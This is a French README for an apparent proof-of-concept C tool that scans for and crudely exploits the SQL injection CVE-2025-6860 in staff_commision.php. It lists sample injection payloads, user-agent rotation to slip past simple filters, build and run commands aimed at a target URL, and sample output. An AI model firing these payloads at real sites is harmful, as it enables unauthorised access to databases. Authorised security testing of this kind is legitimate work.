
Un outil en ligne de commande de preuve de concept en C pour détecter la vulnérabilité d'injection SQL.
Un outil en ligne de commande, preuve de concept en C, pour détecter (et exploiter rudimentairement) la vulnérabilité d'injection SQL CVE‑2025‑6860 dans staff_commision.php (paramètres fromdate & todate). Utilise libcurl pour les requêtes HTTP, alterne entre des charges utiles et des user‑agents courants, analyse les réponses à la recherche de motifs d'erreur SQL, et affiche une sortie console colorée et pilotée par appels système.
Rotation automatique des charges utiles
Essaie une variété de charges utiles d'injection SQL (' OR 1 -- -, admin' or '1'='1, -1 UNION SELECT 1, …) à la fois sur fromdate et todate.
Cycle dynamique des User‑Agents
Alterne entre une liste de chaînes UA réalistes de navigateurs pour contourner les filtres simples.
HTTP piloté par libcurl
Suit les redirections, désactive la vérification SSL (pour les tests), en‑têtes personnalisés.
Appels système bas niveau pour les E/S
Utilise syscall(write) au lieu de printf() pour des messages colorés et opportuns.
Analyse des réponses
Examine les réponses du serveur à la recherche de plus de 50 signatures d'erreur SQL (MySQL, PostgreSQL, Oracle, MSSQL, OLE‑DB, ODBC, Hibernate, etc.).
Sortie colorée ANSI
Messages de succès / échec / information clairs en vert, bleu, rouge.
Sur Debian/Ubuntu : sudo apt update sudo apt install -y build-essential libcurl4-openssl-dev
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u "http://cible.com/panel/staff_commision.php?fromdate=&todate=" -u, --url Modèle d'URL cible, inclure le chemin de base et les paramètres vides.
Exemple : ./exploit -u "http://vulnweb.com/panel/staff_commision.php?fromdate=&todate=" Si vulnérable, vous verrez :
[+] L'exploitation de CVE-2025-6860 a commencé... [+] URL CIBLE : http://…?fromdate=&todate= [+] Requête envoyée avec succès ! [+] URL COMPLÈTE : http://…?fromdate=' OR 1 -- -&todate=' OR 1 -- - [+] CODE HTTP : 200 [+] Un mot suspect a été trouvé dans la réponse ! [+] Mot‑clé : You have an error in your SQL syntax [+] Le serveur souffre de la vulnérabilité CVE-2025-6860 ! En cas d'échec, il signale les motifs manquants ou les erreurs HTTP.
📂 Structure des fichiers : ├── exploit.c # Logique principale de l'exploit ├── argparse.c # Implémentation minimaliste d'argparse ├── argparse.h # En‑tête pour argparse.c ├── README.md # Cette documentation └── LICENSE # Fichier de licence MIT 📝 Contribuer : Forkez le dépôt
Ajoutez des charges utiles / motifs d'erreur / fonctionnalités d'extraction avancées
Avertissement : Utilisez cet outil uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester. Toute analyse ou exploitation non autorisée est illégale.